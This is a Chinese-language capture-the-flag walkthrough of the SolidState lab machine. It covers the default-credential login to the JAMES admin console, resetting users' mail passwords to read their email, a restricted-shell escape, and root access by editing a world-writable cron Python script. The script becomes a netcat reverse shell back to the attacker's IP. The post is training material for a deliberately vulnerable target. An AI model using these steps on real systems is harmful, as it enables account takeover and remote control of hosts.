Vuln靶机SolidState 【oscp】SolidState，计划任务提权靶场地址：https://www.vulnhub.com/entry/solidstate-1,261/发布日期：2018年9月12日目标：得到root权限&找到flag.txt主机探测，端口扫描一些端口介绍：（22，80忽略）25 端口：SMTP服务，用于发送电子邮件的协议110 端口：pop3是用于接收电子邮件的协议119 端口：是用于传输和读取Usernet新闻组文章的协议。4445 端口：是 JAMES 邮件服务器的远程管理接口，允许管理员通过命令行或Web界面管理邮件服务器的配置，包括用户管理、域名管理、邮件箱管理等。访问网页目录扫描这里是需要用到一个命令，来连接邮件服务器，指定好端口4555，然后使用弱口令root / root 进行登录，再使用help查看命令帮助telnet 是一个用于远程登录和管理服务器的网络协议和命令行工具。它允许用户通过网络连接到远程主机，并在该主机上执行命令。telnet 通常使用端口 23 进行通信，但也可以指定其他端口。listusers 用于显示现有的账户信息，但是我们不知道密码信息，就无法登录pop3邮件服务器，查看电子邮件内容user: james user: thomas user: john user: mindy user: mAIladmin设置（重置）密码setpassword james 123 setpassword thomas 123 setpassword john 123 setpassword mindy 123 setpassword mAIladmin 123登录我们的pop3服务器，用户james的邮件信息同理其他用户都这样查看，下面是john的邮件内容下面是mindy用户的第二封邮件翻译一下看看，这个就是 mindy 用户的ssh密码了username: mindy pass: P@55W0rd1!2@ssh登录后，但是发现系统对这个用户做出了命令执行的一些限制当前目录下有一个user.txt，包含了一个hash值，使用hash-identifierhash识别工具，识别这个加密的类型，但是没有识别到尝试逃逸shell，其他详细的逃逸过程可以参考我这篇文章https://mp.weixin.qq.com/s/YS3lNhIE5V5kFlBLxS49xA这里的逃逸是要用到 pythonssh username@IP "export TERM=xterm;python -c 'import pty;pty.spawn("/bin/bash")'"信息收集uname -a cat /etc/os-release # 没有lsb_release -a命令可以使用这个代替查看计划任务cat /etc/crontab查看文件权限为777的文件信息，不是root用户也能修改并执行文件，那如果这是个root用户设置的一个定时程序呢？查看py脚本内容看看nc 有没有-e参数，结果是有的nc 中的 -e 参数在 Netcat (nc) 中用于指定一个程序，使得 Netcat 在建立连接后执行该程序，并将 Netcat 的标准输入、输出和错误重定向到该程序。这个参数通常用于创建反向shell或监听shell。那么py脚本的内容就如下，来反弹shell#!/usr/bin/env python import os import sys try: os.system('nc 192.168.209.130 6666 -e /bin/bash') except: sys.exit()注意：如果重定向了，过了一会儿没有反弹成功，要么重新连接一次，就像这样这下就能反弹成功了，找到root.txt文件如果直接执行py文件的话，是以当前用户执行的，例如可以看到当前用户为 mindy往期推荐红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学Linux 32位Crossfire游戏缓冲区溢出独立开发零显卡AI引擎！媲美DeepSeek，附源码【oscp】Tr0ll 靶机全系列（1-3），FTP被玩坏了神器分享 红队快速打点工具-DarKnuclei从零开始学SQL注入（sql十大注入类型）：技术解析与实战演练【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【渗透测试】12种rbash逃逸方式总结利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细